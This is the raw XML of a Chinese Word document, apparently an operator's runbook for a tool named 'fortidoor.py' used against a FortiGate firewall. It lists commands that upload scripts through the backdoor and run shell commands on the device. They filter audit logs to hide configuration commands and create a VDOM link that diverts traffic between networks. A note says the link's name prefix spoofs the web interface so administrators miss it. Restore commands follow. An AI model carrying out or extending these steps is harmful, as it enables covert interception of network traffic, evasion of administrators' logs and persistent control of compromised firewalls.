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7F2" w:rsidRDefault="0050133E" w:rsidP="0050133E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="0050133E">
        <w:t>ortigate cli vdom引流</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>日志过滤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0050133E" w:rsidRDefault="0050133E" w:rsidP="0050133E"/>
    <w:p w:rsidR="0050133E" w:rsidRDefault="0050133E" w:rsidP="0050133E"/>
    <w:p w:rsidR="0050133E" w:rsidRDefault="0050133E" w:rsidP="0050133E"/>
    <w:p w:rsidR="0050133E" w:rsidRDefault="0050133E" w:rsidP="0050133E"/>
    <w:p w:rsidR="0050133E" w:rsidRDefault="0050133E" w:rsidP="0050133E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0050133E" w:rsidRDefault="003E3090" w:rsidP="008F51BD">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3090">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传日志过滤脚本read</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3090">
        <w:t>mem.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290F6D" w:rsidRPr="003E3090" w:rsidRDefault="00290F6D" w:rsidP="0050133E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E3090" w:rsidRDefault="003E3090" w:rsidP="003E3090">
      <w:r>
        <w:t>python3 fortidoor.py -t https://192.168.1.99/ --action upload --lfile readmem.js --rfile readmem.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3090" w:rsidRDefault="003E3090" w:rsidP="003E3090"/>
    <w:p w:rsidR="003E3090" w:rsidRPr="003E3090" w:rsidRDefault="003E3090" w:rsidP="008F51BD">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3090">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传vdom配置脚本new</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3090">
        <w:t>cli.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3090" w:rsidRDefault="003E3090" w:rsidP="003E3090">
      <w:r>
        <w:t>python3 fortidoor.py -t https://192.168.1.99/ --action upload --lfile newcli.js --rfile newcli.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3090" w:rsidRDefault="003E3090" w:rsidP="003E3090"/>
    <w:p w:rsidR="003E3090" w:rsidRDefault="003E3090" w:rsidP="003E3090"/>
    <w:p w:rsidR="0050133E" w:rsidRDefault="0050133E" w:rsidP="0050133E"/>
    <w:p w:rsidR="004E29AD" w:rsidRDefault="004E29AD" w:rsidP="00FC7B03">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传vdom恢复引流脚本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E29AD" w:rsidRDefault="004E29AD" w:rsidP="0050133E"/>
    <w:p w:rsidR="004E29AD" w:rsidRDefault="004E29AD" w:rsidP="004E29AD">
      <w:r>
        <w:t>python3 fortidoor.py -t https://192.168.1.99/ --action upload --lfile newcli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>restore.js --rfile newcli_restore.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E29AD" w:rsidRPr="004E29AD" w:rsidRDefault="004E29AD" w:rsidP="0050133E"/>
    <w:p w:rsidR="004E29AD" w:rsidRDefault="004E29AD" w:rsidP="0050133E"/>
    <w:p w:rsidR="004E29AD" w:rsidRDefault="004E29AD" w:rsidP="0050133E"/>
    <w:p w:rsidR="0050133E" w:rsidRDefault="005539D5" w:rsidP="0050133E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引流命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3090" w:rsidRDefault="003E3090" w:rsidP="003E3090"/>
    <w:p w:rsidR="003E3090" w:rsidRDefault="003E3090" w:rsidP="003E3090"/>
    <w:p w:rsidR="003E3090" w:rsidRDefault="003E3090" w:rsidP="003E3090"/>
    <w:p w:rsidR="003E3090" w:rsidRPr="003E3090" w:rsidRDefault="003E3090" w:rsidP="008F51BD">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3090">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>日志过滤命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3090" w:rsidRDefault="003E3090" w:rsidP="003E3090"/>
    <w:p w:rsidR="003E3090" w:rsidRDefault="003E3090" w:rsidP="003E3090">
      <w:r>
        <w:t>python3 fortidoor.py -t https://192.168.1.99/ --action shell --cmd "/bin/node readmem.js --filter:Add ,Edit ,Link "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3090" w:rsidRDefault="003E3090" w:rsidP="003E3090"/>
    <w:p w:rsidR="003E3090" w:rsidRDefault="00204519" w:rsidP="003E3090">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上述命令过滤了包含“Add“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>Edit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>Link</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“的所有命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3090" w:rsidRDefault="003E3090" w:rsidP="003E3090"/>
    <w:p w:rsidR="008F51BD" w:rsidRDefault="008F51BD" w:rsidP="003E3090"/>
    <w:p w:rsidR="008F51BD" w:rsidRDefault="008F51BD" w:rsidP="003E3090"/>
    <w:p w:rsidR="008F51BD" w:rsidRDefault="008F51BD" w:rsidP="003E3090"/>
    <w:p w:rsidR="003E3090" w:rsidRDefault="003E3090" w:rsidP="008F51BD">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3090">
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3090">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dom引流命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3035" w:rsidRPr="003E3090" w:rsidRDefault="00AD3035" w:rsidP="003E3090">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E3090" w:rsidRDefault="003E3090" w:rsidP="003E3090">
      <w:r>
        <w:t>python3 fortidoor.py -t https://192.168.1.99/ --action shell --cmd "/bin/node newcli.js T-link root VDOM-B port1 port9 192.168.2.128/24 192.168.8.1/24"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3035" w:rsidRDefault="00AD3035" w:rsidP="003E3090"/>
    <w:p w:rsidR="00C427B4" w:rsidRDefault="00C427B4" w:rsidP="003E3090"/>
    <w:p w:rsidR="00C427B4" w:rsidRPr="00290F6D" w:rsidRDefault="00290F6D" w:rsidP="003E3090">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>引流</w:t>
      </w:r>
      <w:r w:rsidR="00447CF1" w:rsidRPr="00290F6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>命令格式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00447CF1" w:rsidRDefault="00447CF1" w:rsidP="003E3090"/>
    <w:p w:rsidR="00447CF1" w:rsidRDefault="008F51BD" w:rsidP="00447CF1">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/node </w:t>
      </w:r>
      <w:r w:rsidR="00447CF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">newcli.js </w:t>
      </w:r>
      <w:r w:rsidR="00447CF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;VDOM-LINK名称&gt; &lt;VDOM_A&gt; &lt;VDOM_B&gt; &lt;IFACE_A&gt; &lt;IFACE_B&gt; &lt;NET_A&gt; &lt;NET_B&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00447CF1" w:rsidRDefault="00447CF1" w:rsidP="00447CF1">
      <w:pPr>
        <w:wordWrap w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00447CF1" w:rsidRDefault="00447CF1" w:rsidP="00447CF1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5264150" cy="914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CF1" w:rsidRDefault="00447CF1" w:rsidP="00447CF1"/>
    <w:p w:rsidR="00447CF1" w:rsidRDefault="00447CF1" w:rsidP="00447CF1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00447CF1" w:rsidRDefault="00447CF1" w:rsidP="00447CF1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VDOM-LINK名称不超过11个字符，（带默认T-前缀，web页面欺骗生效）；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00447CF1" w:rsidRDefault="00447CF1" w:rsidP="00447CF1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IFACE_A属于VDOM_A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00447CF1" w:rsidRDefault="00447CF1" w:rsidP="00447CF1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NET_A属于IFACE_A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00447CF1" w:rsidRDefault="00447CF1" w:rsidP="00447CF1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IFACE_B属于VDOM_B</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00447CF1" w:rsidRDefault="00447CF1" w:rsidP="00447CF1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NET_B属于IFACE_B</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726486" w:rsidRDefault="00726486" w:rsidP="00447CF1"/>
    <w:p w:rsidR="00726486" w:rsidRDefault="00726486" w:rsidP="00447CF1"/>
    <w:p w:rsidR="005539D5" w:rsidRDefault="005539D5" w:rsidP="00447CF1"/>
    <w:p w:rsidR="005539D5" w:rsidRDefault="005539D5" w:rsidP="00447CF1"/>
    <w:p w:rsidR="005539D5" w:rsidRDefault="005539D5" w:rsidP="005539D5">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>引流恢复</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005539D5" w:rsidRDefault="005539D5" w:rsidP="005539D5">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志过滤恢复命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005539D5" w:rsidRDefault="005539D5" w:rsidP="005539D5"/>
    <w:p w:rsidR="005539D5" w:rsidRDefault="005539D5" w:rsidP="005539D5">
      <w:r>
        <w:t>python3 fortidoor.py -t https://192.168.1.99/ --action shell --cmd "/bin/node readmem.js --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>un</w:t>
      </w:r>
      <w:r>
        <w:t>filter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005539D5" w:rsidRPr="005539D5" w:rsidRDefault="005539D5" w:rsidP="005539D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00726486" w:rsidRDefault="001E760D" w:rsidP="00726486">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Vdom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引流</w:t>
      </w:r>
      <w:r w:rsidR="00726486">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恢复</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726486" w:rsidRDefault="00726486" w:rsidP="00726486"/>
    <w:p w:rsidR="00726486" w:rsidRDefault="00726486" w:rsidP="00726486"/>
    <w:p w:rsidR="008F51BD" w:rsidRDefault="008F51BD" w:rsidP="008F51BD">
      <w:r>
        <w:t xml:space="preserve">python3 fortidoor.py -t https://192.168.1.99/ --action shell --cmd "/bin/node </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>newcli_restore</w:t>
      </w:r>
      <w:r>
        <w:t>.js T-link root VDOM-B"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F51BD" w:rsidRDefault="008F51BD" w:rsidP="00726486"/>
    <w:p w:rsidR="003977DE" w:rsidRDefault="003977DE" w:rsidP="00726486"/>
    <w:p w:rsidR="003977DE" w:rsidRPr="001E760D" w:rsidRDefault="003977DE" w:rsidP="003977DE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E760D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>命令格式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003977DE" w:rsidRPr="003977DE" w:rsidRDefault="003977DE" w:rsidP="00726486"/>
    <w:p w:rsidR="00726486" w:rsidRDefault="00726486" w:rsidP="00726486">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/node newcli_restore.js  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;VDOM-LINK名称&gt; &lt;VDOM_A&gt; &lt;VDOM_B&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00447CF1" w:rsidRDefault="00447CF1" w:rsidP="003E3090"/>
    <w:p w:rsidR="00726486" w:rsidRDefault="00605D39" w:rsidP="003E3090">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59028518" wp14:editId="5CC2A4A5">
            <wp:extent cx="5274310" cy="753110"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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D39" w:rsidRDefault="00605D39" w:rsidP="003E3090"/>
    <w:p w:rsidR="00605D39" w:rsidRDefault="00605D39" w:rsidP="003E3090"/>
    <w:p w:rsidR="005539D5" w:rsidRDefault="005539D5" w:rsidP="003E3090"/>
    <w:p w:rsidR="005539D5" w:rsidRDefault="00653F6B" w:rsidP="003E3090">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除vdom之前需要首先删除vdom</w:t>
      </w:r>
      <w:r>
        <w:t>-link</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，否则无法删除vdom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35862" w:rsidRDefault="00A35862" w:rsidP="003E3090">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00C427B4" w:rsidRDefault="00C427B4" w:rsidP="00C427B4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C427B4" w:rsidRDefault="00C427B4" w:rsidP="00C427B4"/>
    <w:p w:rsidR="00C427B4" w:rsidRDefault="00C427B4" w:rsidP="00C427B4"/>
    <w:p w:rsidR="00C427B4" w:rsidRDefault="00C427B4" w:rsidP="00C427B4">
      <w:r w:rsidRPr="00C427B4">
        <w:object w:dxaOrig="1261" w:dyaOrig="8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41pt" o:ole="">
            <v:imagedata r:id="rId8" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1845197862" r:id="rId9"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C427B4" w:rsidRDefault="00C427B4" w:rsidP="00C427B4"/>
    <w:p w:rsidR="00C427B4" w:rsidRPr="00C427B4" w:rsidRDefault="00C427B4" w:rsidP="00C427B4"/>
    <w:p w:rsidR="00C427B4" w:rsidRDefault="0088478F" w:rsidP="003E3090">
      <w:r w:rsidRPr="0088478F">
        <w:object w:dxaOrig="1750" w:dyaOrig="821">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:87.5pt;height:41pt" o:ole="">
            <v:imagedata r:id="rId10" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1845197863" r:id="rId11"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C427B4" w:rsidRDefault="00C427B4" w:rsidP="003E3090"/>
    <w:p w:rsidR="00C427B4" w:rsidRDefault="0088478F" w:rsidP="003E3090">
      <w:r w:rsidRPr="0088478F">
        <w:object w:dxaOrig="900" w:dyaOrig="821">
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:45pt;height:41pt" o:ole="">
            <v:imagedata r:id="rId12" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1845197864" r:id="rId13"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3090" w:rsidRPr="003E3090" w:rsidRDefault="003E3090" w:rsidP="003E3090"/>
    <w:p w:rsidR="003E3090" w:rsidRPr="003E3090" w:rsidRDefault="003E3090" w:rsidP="003E3090"/>
    <w:sectPr w:rsidR="003E3090" w:rsidRPr="003E30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15E8" w:rsidRDefault="002415E8" w:rsidP="0050133E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="002415E8" w:rsidRDefault="002415E8" w:rsidP="0050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15E8" w:rsidRDefault="002415E8" w:rsidP="0050133E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="002415E8" w:rsidRDefault="002415E8" w:rsidP="005013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E53"/>
    <w:rsid w:val="0010351E"/>
    <w:rsid w:val="001E760D"/>
    <w:rsid w:val="00204519"/>
    <w:rsid w:val="002415E8"/>
    <w:rsid w:val="00290F6D"/>
    <w:rsid w:val="003977DE"/>
    <w:rsid w:val="003E3090"/>
    <w:rsid w:val="00447CF1"/>
    <w:rsid w:val="004E29AD"/>
    <w:rsid w:val="0050133E"/>
    <w:rsid w:val="005539D5"/>
    <w:rsid w:val="00605D39"/>
    <w:rsid w:val="0062312C"/>
    <w:rsid w:val="00653F6B"/>
    <w:rsid w:val="00726486"/>
    <w:rsid w:val="007943E3"/>
    <w:rsid w:val="00824B8C"/>
    <w:rsid w:val="0088478F"/>
    <w:rsid w:val="008F51BD"/>
    <w:rsid w:val="00A35862"/>
    <w:rsid w:val="00A50F20"/>
    <w:rsid w:val="00AD3035"/>
    <w:rsid w:val="00C427B4"/>
    <w:rsid w:val="00C93E53"/>
    <w:rsid w:val="00DD14BC"/>
    <w:rsid w:val="00FB0BCB"/>
    <w:rsid w:val="00FC7B03"/>
    <w:rsid w:val="00FE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70B8DD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6081FD1D-D998-4F66-AFE5-167D39A64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13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013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648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13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13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13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133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0133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0133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2648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6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刘金光01</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>刘金光01</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-09T07:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-10T06:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>